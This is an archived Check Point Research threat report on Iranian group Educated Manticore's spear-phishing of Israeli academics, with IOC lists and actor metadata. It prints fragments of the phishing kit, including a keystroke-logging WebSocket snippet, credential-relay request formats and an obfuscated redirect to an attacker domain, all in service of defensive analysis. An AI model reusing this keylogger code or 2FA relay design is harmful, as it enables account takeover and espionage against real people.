{ "id": "bac3339e-92b3-4383-a56e-c304f9500210", "created_at": "2026-04-06T00:22:37.988684Z", "updated_at": "2026-04-10T03:36:00.857438Z", "deleted_at": null, "sha1_hash": "88e6c0507028884b56f837182b43f2648f5f0083", "title": "Iranian Educated Manticore Targets Leading Tech Academics - Check Point Research", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 102696, "plain_text": "Iranian Educated Manticore Targets Leading Tech Academics -\r\nCheck Point Research\r\nBy samanthar@checkpoint.com\r\nPublished: 2025-06-25 · Archived: 2026-04-05 15:47:29 UTC\r\nKey findings\r\nAmid ongoing tensions between Iran and Israel, the Iranian threat group Educated\r\nManticore, associated with the Islamic Revolutionary Guard Corps, has launched spear-phishing\r\ncampaigns targeting Israeli journalists, high-profile cyber security experts and computer science professors\r\nfrom leading Israeli universities.\r\nIn some of those campaigns, Israeli technology and cyber security professionals were approached by\r\nattackers who posed as fictitious assistant to technology executives or researchers through emails and\r\nWhatsApp messages.\r\nThe threat actors directed victims who engaged with them to fake Gmail login pages or Google Meet\r\ninvitations. Credentials entered on these phishing pages are sent to the attackers, enabling them to intercept\r\nboth passwords and 2FA codes and gain unauthorized access to the victims’ accounts.\r\nCheck Point Research continues to track the large and evolving cluster of infrastructure used to facilitate\r\ncredential harvesting in support of Educated Manticore’s cyber-espionage activities.\r\nIntroduction\r\nFor the last few years, Check Point Research has been monitoring the activity of the Iranian APT group, Educated\r\nManticore. This group aligns with activity tracked by the wider security community as APT42, Charming Kitten,\r\nor Mint Sandstorm, and is believed to operate on behalf of the Islamic Revolutionary Guard Corps’ Intelligence\r\nOrganization (IRGC-IO).\r\nOver the years, Educated Manticore has consistently used spear-phishing as a core tactic to target individuals\r\nacross government, military, research, media, and policy sectors. In addition to developing and deploying custom\r\nbackdoors such as CharmPower (aka POWERSTAR) and PowerLess, the group has conducted numerous targeted\r\nphishing campaigns including those aimed at senior officials and their PII and identity documents.\r\nOne of the group’s long-running operations targets Israeli individuals fake meeting invitations. Attackers\r\nimpersonate a wide range of personas, from high-ranking individuals to journalists or researchers, to gain\r\ncredibility and lure victims into interaction. Victims are then directed to custom phishing kits designed to harvest\r\ncredentials to their Google, Outlook, or Yahoo accounts. In some reported cases, this has compromised Israeli\r\njournalists’ accounts. Following the outbreak of the Iran–Israel war, we observed a new phase of this campaign in\r\nwhich Educated Manticore began using the name and credibility of cybersecurity companies to gain their victims’\r\ntrust, focusing on renowned academic experts in cyber security and computer technology.\r\nhttps://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\r\nPage 1 of 13\n\nInitial Vector: Spear-phishing\r\nStarting mid-June, top cyber and computer science experts from leading Israeli universities were approached by\r\nindividuals impersonating fictitious employees of cybersecurity companies, either by email or in WhatsApp\r\nmessages.\r\nFigure 1 – Initial email impersonating a fictitious Threat Intelligence Analyst.\r\nJudging by the formal tone, structured layout, and error-free grammar, the email appears to have been crafted with\r\nAI assistance. However, despite its polished writing, some observant targets noticed signs that revealed it was fake\r\n— for instance, a mismatch between the name in the email body “Sarah Novominski” and the sender’s email\r\naccount name, “Sara Noviminski”.\r\nAnother message, sent via WhatsApp to a different target, leverages the current tensions between Iran and Israel to\r\nlure the recipient into an urgent meeting. Interestingly, in this case, the threat actors also suggest meeting in person\r\nin Tel Aviv. This could be a tactic aimed to secure quicker confirmation for an online meeting. However, given\r\nthe history of Iranian operations, the possibility that this campaign extends beyond cyberspace cannot be entirely\r\nruled out.\r\nhttps://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\r\nPage 2 of 13\n\nFigure 2 – Part of a WhatsApp message impersonating a fictitious employee of a cybersecurity\r\ncompany.\r\nIn all cases, the initial message contains no links, but the attackers quickly gain the victims’ trust through prompt\r\nand persuasive interactions, ultimately guiding them to an online meeting link that leads to attacker-controlled\r\nphishing infrastructure.\r\nGoogle Authentication Custom Phishing Kit\r\nBefore sending the phishing link, threat actors ask the victim for their email address. This address is then pre-filled\r\non the credential phishing page to increase credibility and mimic the appearance of a legitimate Google\r\nAuthentication flow.\r\nhttps://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\r\nPage 3 of 13\n\n---\nmeta-viewport: width=device-width,initial-scale=1\n---\nFigure 3 – Link to the phishing page sent via WhatsApp to one of the targets. The target communicates in Hebrew\nand refuses to use the link as it suspiciously asks for credentials.\nThe phishing kit used by Educated Manticore is implemented as a Single Page Application (SPA) built with React.\nIt is tightly bundled, minified, and obfuscated. The main page code of it is very laconic as all the visible UI is\ndynamically rendered by JS (in the example below, main.a184cc65.js ) once the app loads:\nYou need to enable JavaScript to run this app.\n\nYou need to enable JavaScript to run this app.\n\nhttps://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\nPage 4 of 13\n\nYou need to enable JavaScript to run this app.\n\nDue to its Single Page Application (SPA) nature, the page is never reloaded during navigation between steps, and\nit doesn’t perform traditional full-page form submissions. Instead, it uses React Router to update views client-side,\nsubmits data asynchronously via POST to the backend API, and dynamically renders each authentication step\nusing React components based on the authentication session state.\nIn the main.a184cc65.js page from the above example, the backend is hosted at https://idea-home[.]online:8569 . To initiate the phishing flow, the kit sends a POST request to /info/param with JSON\nannouncing the new victim connection:\n\"link\": \"\"\n\"ip\": \"\", // placeholder 0.0.0.1\n\"user_agent\": \"\"\n{ \"sk\": \"\", \"sub_d\": \"\", \"link\": \"\" \"ip\": \"\", // placeholder\n0.0.0.1 \"user_agent\": \"\" }\n{\n\"sk\": \"\",\n\"sub_d\": \"\",\n\"link\": \"\"\n\"ip\": \"\", // placeholder 0.0.0.1\n\"user_agent\": \"\"\n}\nThe host combined with the search string (or path) forms the complete URL that the victim clicked, which the\nserver uses to identify the victim. In response, the server returns a JSON payload containing task-specific\nconfiguration, such as which authentication screen to display and any pre-filled victim email address to use.\n\"id\": \"\", // Session key to track victim\n\"path\": \"gl_password\", // Next screen to show\n\"link\": \"\", // Optional: redirect URL\n\"inputs\": [ // Prefilled input fields\n{ \"key\": \"email\", \"content\": \"\" },\n{ \"id\": \"\", // Session key to track victim \"path\": \"gl_password\", // Next screen to show \"link\": \"\", //\nOptional: redirect URL \"inputs\": [ // Prefilled input fields { \"key\": \"email\", \"content\": \"\" }, ] }\nhttps://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\nPage 5 of 13\n\n{\r\n \"id\": \"\u003csession key\u003e\", // Session key to track victim\r\n \"path\": \"gl_password\", // Next screen to show\r\n \"link\": \"\", // Optional: redirect URL\r\n \"inputs\": [ // Prefilled input fields\r\n { \"key\": \"email\", \"content\": \"\u003cemail of victim\u003e\" },\r\n ]\r\n}\r\nThe steps for the victim to pass on the phishing page depend on their account’s security settings. The kit handles\r\nall the following logical steps supported by Google Authentication mechanisms:\r\nKey Purpose\r\ngl_signin Email/username entry form (1st step)\r\ngl_sms_code Enter SMS verification code\r\ngl_password Password input page\r\ngl_verify “Verify it’s you” prompt (e.g., challenge)\r\ngl_tab Tab-based phone prompt\r\ngl_prompt “Yes/No” type approval\r\ngl_email_code Code sent to email\r\ngl_phone_number Enter the last digits of the phone number\r\ngl_security_code Manual code entry (TOTP/SMS)\r\ngl_authenticator Google Authenticator UI\r\ngl_not_found Fallback screen if page ID not found\r\ngl_qr_code QR scan for 2FA setup\r\ngl_change_password Password reset screen\r\ngl_no_signin Generic “not signed in” or error screen\r\nBy supporting these authentication flows, the kit enables 2FA relay attacks, when a threat actor can complete MFA\r\nagainst a legitimate service using stolen data. Data entered by the victim on each of the steps (password, MFA\r\ntoken, etc.) is sent via POST requests to the  /key/send  API endpoint:\r\n\"content\": \"\u003cuser input\u003e\", // e.g., password or 2FA code\r\n\"page\": \"gl_password\" // Current step (e.g., gl_password, gl_verify, ..)\r\nhttps://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\r\nPage 6 of 13\n\n{ \"sk\": \"\u003csession key\u003e\", \"content\": \"\u003cuser input\u003e\", // e.g., password or 2FA code \"page\": \"gl_password\" // Current\r\nstep (e.g., gl_password, gl_verify, ..) }\r\n{\r\n \"sk\": \"\u003csession key\u003e\",\r\n \"content\": \"\u003cuser input\u003e\", // e.g., password or 2FA code\r\n \"page\": \"gl_password\" // Current step (e.g., gl_password, gl_verify, ..)\r\n}\r\nThe kit also maintains a persistent web socket connection on /sessions , which is opened at page load and\r\nremains active throughout the session. It includes a passive keylogger that captures every keystroke and transmits\r\nit live. Each key event sent is marked by d: \"kl\" (”keylogger”):\r\n(0, s.useEffect)((() =\u003e {\r\nn \u0026\u0026 !t \u0026\u0026 n.send(JSON.stringify({\r\nc: a.which in ls ? ls[a.which] : a.key,\r\nsk: localStorage.getItem(\"sk\"),\r\nconsole.log(\"error in socket =\u003e \", s)\r\nreturn window.addEventListener(\"keydown\", a), () =\u003e window.removeEventListener(\"keydown\", a)\r\n(0, s.useEffect)((() =\u003e { const a = async a =\u003e { try { n \u0026\u0026 !t \u0026\u0026 n.send(JSON.stringify({ d: \"kl\", c: a.which in ls\r\n? ls[a.which] : a.key, sk: localStorage.getItem(\"sk\"), page: e })) } catch (s) { console.log(\"error in socket =\u003e \", s) }\r\n}; return window.addEventListener(\"keydown\", a), () =\u003e window.removeEventListener(\"keydown\", a) }), [t, e, n])\r\n (0, s.useEffect)((() =\u003e {\r\n const a = async a =\u003e {\r\n try {\r\n n \u0026\u0026 !t \u0026\u0026 n.send(JSON.stringify({\r\n d: \"kl\",\r\n c: a.which in ls ? ls[a.which] : a.key,\r\n sk: localStorage.getItem(\"sk\"),\r\n page: e\r\n }))\r\n } catch (s) {\r\n console.log(\"error in socket =\u003e \", s)\r\n }\r\n };\r\n return window.addEventListener(\"keydown\", a), () =\u003e window.removeEventListener(\"keydown\", a)\r\n }), [t, e, n])\r\nhttps://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\r\nPage 7 of 13\n\nIn addition to collecting inputs at the time of specific step submission, this keylogger records every character\r\ntyped — even if the user abandons the form or never submits it.\r\nWebSocket connection also allows to send dynamic updates from the server back to the victim, so the attackers\r\ncan redirect victims to specific fake page or step at any time.\r\nFake Google Meet invitations\r\nSome meeting invitations utilized multi-stage phishing pages hosted on Google Sites service  sites.google.com ,\r\na tactic employed by the threat actors in recent years and designed to add legitimacy to the link by using the\r\nGoogle domain.\r\nhttps://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\r\nPage 8 of 13\n\nFigure 4 – A legitimate link (on the right) that the target wanted to use vs. a link to a malicious Google Meet page\n(on the left) that the threat actors insist on using.\nThe fake page is designed to resemble a legitimate Google Meet meeting page. However, once the junk and\nobfuscated code is removed, the underlying structure is quite simple – it displays a hardcoded image:\nFigure 5 - Fake image redirecting to the attackers’ servers.\nFigure 5 – Fake image redirecting to the attackers’ servers.\nThe page has three versions tailored for desktop, tablet, and phone devices. All function identically: when the user\nclicks on the image, they are redirected to the attacker’s website, which hosts phishing pages mimicking Google’s\nauthentication process:\n![](data:image/png;base64,[base64-encoded image]) document.getElementById(\"desktop\").onclick=()=\u003e{ window.open(\"https\" + \":\" + \"//sendly-ink\" + \".\" +\n\"shop/YtgtyyzP\")\n[code omitted] ![](data:image/png;base64,[base64-encoded\nimage]) [code omitted] document.getElementById(\"desktop\").onclick=()=\u003e{ window.open(\"https\" + \":\" +\n\"//sendly-ink\" + \".\" + \"shop/YtgtyyzP\") [code omitted]\n[code omitted]\n![](data:image/png;base64,[base64-encoded image]) [code omitted]\ndocument.getElementById(\"desktop\").onclick=()=\u003e{ window.open(\"https\" + \":\" + \"//sendly-ink\" + \".\" +\n[code omitted]\nInfrastructure\nWe assess that threat actors started using the custom phishing kit described earlier in January 2025. In addition to\nGoogle/Gmail phishing pages, the threat actor has similar React-based phishing kits for Outlook and Yahoo Email\nin their toolset. Both are rarely observed comparing to Gmail pages. The Yahoo phishing page behaves similarly to\nthe Gmail-themed kit: it uses route identifiers prefixed with yh_ (such as yh_signin , yh_password ,\nyh_enter_code , etc.) to manage the flow between authentication steps, and includes a similar passive keylogger\nthat captures every keystroke in real time. The Outlook phishing kit also uses React Router to manage the\nprogression of phishing steps, but it doesn’t expose route paths in the URL. Instead, steps are internally labelled\n(e.g., page: \"out_signin\" , page: \"out_2FA_email\" , page: \"out_authenticator_app\" , etc.), making the flow\nconsistent with the Gmail and Yahoo kits — though with less explicit route naming.\nFrom January 2025 onward, threat actors registered many domains that have been used for targeted phishing\noperations, either hosting phishing kits or serving as their backend. The underlying infrastructure relied on more\nhttps://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\nPage 9 of 13\n\nthan 130 unique domains (along with numerous subdomains), resolving to a dozen distinct IP addresses. Most of\r\nthese domains are registered with the NameCheap registrar.\r\nThe older IPs from this infrastructure cluster match the public fingerprint of GreenCharlie, which we consider a\r\nsub-cluster of Educated Manticore, with many of the domains following the same name patterns.\r\nConclusion\r\nEducated Manticore continues to pose a persistent and high-impact threat, particularly to individuals in Israel\r\nduring the escalation phase of the Iran-Israel conflict. Despite increased exposure by the cybersecurity community,\r\nthe group continues to operate steadily, characterized by aggressive spear-phishing, rapid setup of domains,\r\nsubdomains, and infrastructure, and fast-paced takedowns when identified. This agility allows them to remain\r\neffective under heightened scrutiny.\r\nThe custom phishing kit used in Educated Manticore campaigns closely imitates familiar login pages, like those\r\nfrom Google, using modern web technologies such as React-based Single Page Applications (SPA) and dynamic\r\npage routing. It also uses real-time WebSocket connections to send stolen data, and the design allows it to hide its\r\ncode from additional scrutiny.\r\nGiven the vulnerable nature of their targets — often operating in sensitive or trust-based environments with\r\nexternal peers — we assess that Educated Manticore tactics will continue to focus on stealing identities and\r\ncredentials linked to the regime’s interests.\r\nIOCs\r\nIPs:\r\n185.130.226[.]71\r\n45.12.2[.]158\r\n45.143.166[.]230\r\n91.222.173[.]141\r\n194.11.226[.]9\r\n195.66.213[.]132\r\n146.19.254[.]238\r\n194.11.226[.]29\r\n194.11.226[.]46\r\n194.61.120[.]185\r\n2.56.126[.]230\r\n194.11.226[.]5\r\nDomains:\r\nconn-ectionor[.]cfd\r\noptio-nalynk[.]online\r\nques-tion-ing[.]xyz\r\nsendly-ink[.]shop\r\nhttps://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\r\nPage 10 of 13\n\nshaer-likn[.]store\r\nalison624[.]online\r\nbestshopu[.]online\r\nblack-friday-store[.]online\r\nidea-home[.]online\r\nbook-handwrite[.]online\r\nworld-shop[.]online\r\nlenan-rex[.]online\r\nfirst-course[.]online\r\nreading-course[.]online\r\nmake-house[.]online\r\nest5090[.]online\r\nzra-roll[.]online\r\ntomas-company[.]online\r\nclame-rade[.]online\r\ndmn-for-hall[.]online\r\nword-course[.]online\r\nclothes-show[.]online\r\nexpressmarket[.]online\r\nloads-ideas[.]online\r\nsky-writer[.]online\r\nbecker624[.]online\r\nadams-cooling[.]online\r\nstadium-fresh[.]online\r\nroyalsoul[.]online\r\nlive-message[.]online\r\nteammate-live[.]online\r\nwood-house[.]online\r\nude-final[.]online\r\ncity-splash[.]online\r\ndoor-black-meter[.]online\r\nprt-max[.]online\r\nalbert-company[.]online\r\nhuman-fly900[.]online\r\ndmn-for-car[.]online\r\ngood-student[.]online\r\ngoods-companies[.]online\r\npnl-worth[.]online\r\nricardo-mell[.]online\r\nlive-coaching[.]online\r\nwer-d[.]info\r\nspring-club[.]info\r\nall-for-city[.]info\r\nbeta-man[.]info\r\namg-car-ger[.]info\r\ncc-newton[.]info\r\nsteve-brown[.]info\r\nhttps://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\r\nPage 11 of 13\n\nconnect-room[.]online\r\nlive-gml[.]online\r\nroland-cc[.]online\r\nexir-juice[.]online\r\nyamal-group[.]online\r\nlive-conn[.]online\r\nonline-room[.]online\r\nplatinum-cnt[.]info\r\ncrysus-h[.]info\r\nlynda-tricks[.]online\r\nmessage-live[.]online\r\nwhite-life-bl[.]info\r\nmeet-work[.]info\r\nprj-ph[.]info\r\nhrd-dmn[.]info\r\nntp-clock-h[.]info\r\nwork-meeting[.]info\r\nph-crtdomain[.]info\r\nnsim-ph[.]info\r\nwarning-d[.]info\r\nlive-meet[.]cloud\r\nlive-meet[.]blog\r\nlive-meet[.]info\r\nlive-meet[.]cfd\r\nlive-meet[.]live\r\nnetwork-show[.]online\r\nredirect-review[.]online\r\narizonaclub[.]me\r\nbackback[.]info\r\ncloth-model[.]blog\r\ncook-tips[.]info\r\nnetwork-review[.]xyz\r\nsocks[.]beauty\r\ngallery-shop[.]online\r\nnetwork-game[.]xyz\r\ngood-news[.]cfd\r\nnetwork-show-a[.]online\r\npanel-network[.]online\r\npanel-redirect[.]online\r\nencryption-redirect[.]online\r\nthomas-mark[.]xyz\r\nrap-art[.]info\r\nanna-blog[.]info\r\narrow-click[.]info\r\nbest85best[.]online\r\nshadow-network[.]best\r\ngood-news[.]fashion\r\nhttps://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\r\nPage 12 of 13\n\nwarplogic[.]pro\r\ncyberlattice[.]pro\r\nshow-verify[.]xyz\r\ntop-game[.]online\r\nsuite-moral[.]info\r\nnice-goods[.]online\r\ncrysus-p[.]info\r\nwash-less[.]online\r\nptr-cc[.]online\r\nwhite-car[.]online\r\nlive-content[.]online\r\nbracs-lion[.]online\r\nstorm-wave[.]online\r\ncourse-math[.]info\r\nfood-tips-blog[.]online\r\nwhite-life[.]info\r\nph-work[.]info\r\nnormal-dmn[.]info\r\npanel-meeting[.]info\r\nprj-pa[.]info\r\nntp-clock-p[.]info\r\nnsim-pa[.]info\r\npa-crtdomain[.]info\r\ninfinit-world[.]info\r\nalex-mendez-fire[.]info\r\nreg-d[.]info\r\neverything-here[.]info\r\nhealthy-lifestyle[.]fit\r\nalpha-man[.]info\r\nlesson-first[.]info\r\nmaster-club[.]info\r\nSource: https://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\r\nhttps://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics" ], "report_names": [ "iranian-educated-manticore-targets-leading-tech-academics" ], "threat_actors": [ { "id": "82b92285-4588-48c9-8578-bb39f903cf62", "created_at": "2022-10-25T15:50:23.850506Z", "updated_at": "2026-04-10T02:00:05.418577Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "Charming Kitten" ], "source_name": "MITRE:Charming Kitten", "tools": [ "DownPaper" ], "source_id": "MITRE", "reports": null }, { "id": "d8af157e-741b-4933-bb4a-b78490951d97", "created_at": "2023-01-06T13:46:38.748929Z", "updated_at": "2026-04-10T02:00:03.087356Z", "deleted_at": null, "main_name": "APT35", "aliases": [ "COBALT MIRAGE", "Agent Serpens", "Newscaster Team", "Magic Hound", "G0059", "Phosphorus", "Mint Sandstorm", "TunnelVision" ], "source_name": "MISPGALAXY:APT35", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c398d083-1e86-4cee-8937-eb057f0e6fdc", "created_at": "2022-10-25T16:07:24.172423Z", "updated_at": "2026-04-10T02:00:04.888972Z", "deleted_at": null, "main_name": "Shadow Network", "aliases": [], "source_name": "ETDA:Shadow Network", "tools": [ "ShadowNet" ], "source_id": "ETDA", "reports": null }, { "id": "d0e8337e-16a7-48f2-90cf-8fd09a7198d1", "created_at": "2023-03-04T02:01:54.091301Z", "updated_at": "2026-04-10T02:00:03.356317Z", "deleted_at": null, "main_name": "APT42", "aliases": [ "UNC788", "CALANQUE" ], "source_name": "MISPGALAXY:APT42", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7d8ef10e-1d7b-49a0-ab6e-f1dae465a1a4", "created_at": "2023-01-06T13:46:38.595679Z", "updated_at": "2026-04-10T02:00:03.033762Z", "deleted_at": null, "main_name": "PLATINUM", "aliases": [ "TwoForOne", "G0068", "ATK33" ], "source_name": "MISPGALAXY:PLATINUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e61c46f7-88a1-421a-9fed-0cfe2eeb820a", "created_at": "2022-10-25T16:07:24.061767Z", "updated_at": "2026-04-10T02:00:04.854503Z", "deleted_at": null, "main_name": "Platinum", "aliases": [ "ATK 33", "G0068", "Operation EasternRoppels", "TwoForOne" ], "source_name": "ETDA:Platinum", "tools": [ "AMTsol", "Adupib", "Adupihan", "Dipsind", "DvDupdate.dll", "JPIN", "LOLBAS", "LOLBins", "Living off the Land", "RedPepper", "RedSalt", "Titanium", "adbupd", "psinstrc.ps1" ], "source_id": "ETDA", "reports": null }, { "id": "029625d2-9734-44f9-9e10-b894b4f57f08", "created_at": "2023-01-06T13:46:38.364105Z", "updated_at": "2026-04-10T02:00:02.944092Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "iKittens", "Group 83", "NewsBeef", "G0058", "CharmingCypress", "Mint Sandstorm", "Parastoo" ], "source_name": "MISPGALAXY:Charming Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "172e5e21-e954-4322-9317-41f2cbaed7f1", "created_at": "2023-01-06T13:46:38.992713Z", "updated_at": "2026-04-10T02:00:03.174179Z", "deleted_at": null, "main_name": "Shadow Network", "aliases": [], "source_name": "MISPGALAXY:Shadow Network", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03", "created_at": "2025-08-07T02:03:24.746965Z", "updated_at": "2026-04-10T02:00:03.640335Z", "deleted_at": null, "main_name": "COBALT ILLUSION", "aliases": [ "APT35 ", "APT42 ", "Agent Serpens Palo Alto", "Charming Kitten ", "CharmingCypress ", "Educated Manticore Checkpoint", "ITG18 ", "Magic Hound ", "Mint Sandstorm sub-group ", "NewsBeef ", "Newscaster ", "PHOSPHORUS sub-group ", "TA453 ", "UNC788 ", "Yellow Garuda " ], "source_name": "Secureworks:COBALT ILLUSION", "tools": [ "Browser Exploitation Framework (BeEF)", "MagicHound Toolset", "PupyRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "51258c82-52c1-4a82-b5f6-105f8e0cac57", "created_at": "2024-10-25T02:02:07.722918Z", "updated_at": "2026-04-10T02:00:04.713878Z", "deleted_at": null, "main_name": "GreenCharlie", "aliases": [], "source_name": "ETDA:GreenCharlie", "tools": [ "CharmPower", "GORBLE", "GorjolEcho", "NOKNOK", "POWERSTAR", "TAMECAT" ], "source_id": "ETDA", "reports": null }, { "id": "0b212c43-009a-4205-a1f7-545c5e4cfdf8", "created_at": "2025-04-23T02:00:55.275208Z", "updated_at": "2026-04-10T02:00:05.270553Z", "deleted_at": null, "main_name": "APT42", "aliases": [ "APT42" ], "source_name": "MITRE:APT42", "tools": [ "NICECURL", "TAMECAT" ], "source_id": "MITRE", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null }, { "id": "33f527a5-a5da-496a-a48c-7807cc858c3e", "created_at": "2022-10-25T15:50:23.803657Z", "updated_at": "2026-04-10T02:00:05.333523Z", "deleted_at": null, "main_name": "PLATINUM", "aliases": [ "PLATINUM" ], "source_name": "MITRE:PLATINUM", "tools": [ "JPIN", "Dipsind", "adbupd" ], "source_id": "MITRE", "reports": null }, { "id": "1efe328c-7bda-49d8-82bf-852d220110ae", "created_at": "2026-01-22T02:00:03.661882Z", "updated_at": "2026-04-10T02:00:03.917703Z", "deleted_at": null, "main_name": "Educated Manticore", "aliases": [], "source_name": "MISPGALAXY:Educated Manticore", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434957, "ts_updated_at": 1775792160, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/88e6c0507028884b56f837182b43f2648f5f0083.pdf", "text": "https://archive.orkl.eu/88e6c0507028884b56f837182b43f2648f5f0083.txt", "img": "https://archive.orkl.eu/88e6c0507028884b56f837182b43f2648f5f0083.jpg" } }